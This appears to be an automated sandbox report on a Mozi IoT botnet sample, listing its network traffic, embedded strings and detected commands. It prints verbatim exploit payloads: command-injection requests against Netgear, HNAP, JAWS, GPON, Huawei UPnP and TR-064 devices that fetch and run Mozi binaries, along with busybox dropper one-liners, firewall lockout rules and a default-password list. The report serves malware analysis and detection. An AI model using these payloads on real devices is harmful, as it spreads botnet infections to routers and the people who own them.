2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 164.125.103.242:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Sample listens on a socket
Source: /tmp/rIbyGX66Op (PID: 4601) Socket: 0.0.0.0::54753 Jump to behavior
Source: unknown TCP traffic detected without corresponding DNS query: 178.40.184.137
Source: unknown TCP traffic detected without corresponding DNS query: 140.39.206.54
Source: unknown TCP traffic detected without corresponding DNS query: 34.8.155.116
Source: unknown TCP traffic detected without corresponding DNS query: 108.184.4.136
Source: unknown TCP traffic detected without corresponding DNS query: 221.160.8.201
Source: unknown TCP traffic detected without corresponding DNS query: 108.39.69.131
Source: unknown TCP traffic detected without corresponding DNS query: 3.51.62.125
Source: unknown TCP traffic detected without corresponding DNS query: 67.118.131.139
Source: unknown TCP traffic detected without corresponding DNS query: 28.86.70.243
Source: unknown TCP traffic detected without corresponding DNS query: 89.235.62.86
Source: unknown TCP traffic detected without corresponding DNS query: 5.75.82.42
Source: unknown TCP traffic detected without corresponding DNS query: 171.112.221.128
Source: unknown TCP traffic detected without corresponding DNS query: 85.117.188.205
Source: unknown TCP traffic detected without corresponding DNS query: 105.109.18.186
Source: unknown TCP traffic detected without corresponding DNS query: 29.5.215.81
Source: unknown TCP traffic detected without corresponding DNS query: 8.114.30.17
Source: unknown TCP traffic detected without corresponding DNS query: 19.112.11.89
Source: unknown TCP traffic detected without corresponding DNS query: 4.186.238.93
Source: unknown TCP traffic detected without corresponding DNS query: 85.124.222.42
Source: unknown TCP traffic detected without corresponding DNS query: 212.9.178.122
Source: unknown TCP traffic detected without corresponding DNS query: 123.152.1.95
Source: unknown TCP traffic detected without corresponding DNS query: 13.229.32.133
Source: unknown TCP traffic detected without corresponding DNS query: 138.94.203.237
Source: unknown TCP traffic detected without corresponding DNS query: 132.84.208.189
Source: unknown TCP traffic detected without corresponding DNS query: 84.219.17.176
Source: unknown TCP traffic detected without corresponding DNS query: 165.94.66.173
Source: unknown TCP traffic detected without corresponding DNS query: 116.56.146.125
Source: unknown TCP traffic detected without corresponding DNS query: 163.60.176.218
Source: unknown TCP traffic detected without corresponding DNS query: 174.9.64.0
Source: unknown TCP traffic detected without corresponding DNS query: 217.196.154.24
Source: unknown TCP traffic detected without corresponding DNS query: 43.162.206.133
Source: unknown TCP traffic detected without corresponding DNS query: 197.46.69.196
Source: unknown TCP traffic detected without corresponding DNS query: 79.58.62.70
Source: unknown TCP traffic detected without corresponding DNS query: 180.195.241.242
Source: unknown TCP traffic detected without corresponding DNS query: 113.203.125.76
Source: unknown TCP traffic detected without corresponding DNS query: 190.166.22.140
Source: unknown TCP traffic detected without corresponding DNS query: 124.94.21.94
Source: unknown TCP traffic detected without corresponding DNS query: 18.184.123.158
Source: unknown TCP traffic detected without corresponding DNS query: 125.178.212.248
Source: unknown TCP traffic detected without corresponding DNS query: 181.215.101.174
Source: unknown TCP traffic detected without corresponding DNS query: 146.97.112.184
Source: unknown TCP traffic detected without corresponding DNS query: 179.8.250.180
Source: unknown TCP traffic detected without corresponding DNS query: 5.71.214.240
Source: unknown TCP traffic detected without corresponding DNS query: 113.237.9.87
Source: unknown TCP traffic detected without corresponding DNS query: 182.151.134.212
Source: unknown TCP traffic detected without corresponding DNS query: 75.104.12.143
Source: unknown TCP traffic detected without corresponding DNS query: 65.192.2.39
Source: unknown TCP traffic detected without corresponding DNS query: 83.106.49.27
Source: unknown TCP traffic detected without corresponding DNS query: 100.221.5.250
Source: unknown TCP traffic detected without corresponding DNS query: 74.164.3.48
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 34.90.159.216:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 69.195.90.130:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 104.72.178.146:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 95.217.3.9:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
Source: unknown DNS traffic detected: queries for: dht.transmissionbt.com
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Apr 2021 19:13:31 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.m
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.m;
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.m;$
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/bin.sh
Source: rIbyGX66Op String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: rIbyGX66Op String found in binary or memory: http://127.0.0.1
Source: rIbyGX66Op String found in binary or memory: http://127.0.0.1sendcmd
Source: rIbyGX66Op String found in binary or memory: http://HTTP/1.1
Source: rIbyGX66Op String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: rIbyGX66Op String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: rIbyGX66Op String found in binary or memory: http://purenetworks.com/HNAP1/
Source: rIbyGX66Op String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: rIbyGX66Op String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: rIbyGX66Op String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php

Spam, unwanted Advertisements and Ransom Demands:

barindex
Writes HTML files containing JavaScript to disk
Source: /tmp/rIbyGX66Op (PID: 4578) HTML file containing JavaScript created: /usr/networks Jump to dropped file

System Summary:

barindex
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Source: Initial sample String containing 'busybox' found: busybox
Source: Initial sample String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Sample contains strings indicative of password brute-forcing capabilities
Source: Initial sample String containing potential weak password found: admin
Source: Initial sample String containing potential weak password found: default
Source: Initial sample String containing potential weak password found: support
Source: Initial sample String containing potential weak password found: service
Source: Initial sample String containing potential weak password found: supervisor
Source: Initial sample String containing potential weak password found: guest
Source: Initial sample String containing potential weak password found: administrator
Source: Initial sample String containing potential weak password found: 123456
Source: Initial sample String containing potential weak password found: 54321
Source: Initial sample String containing potential weak password found: password
Source: Initial sample String containing potential weak password found: 12345
Source: Initial sample String containing potential weak password found: admin1234
Sample contains strings that are potentially command strings
Source: Initial sample Potential command found: POST /cdn-cgi/
Source: Initial sample Potential command found: GET /c HTTP/1.0
Source: Initial sample Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample Potential command found: GET %s HTTP/1.1
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample Potential command found: mount -o remount,rw /overlay /
Source: Initial sample Potential command found: mv -f %s %s
Source: Initial sample Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample Potential command found: GET /c
Source: Initial sample Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
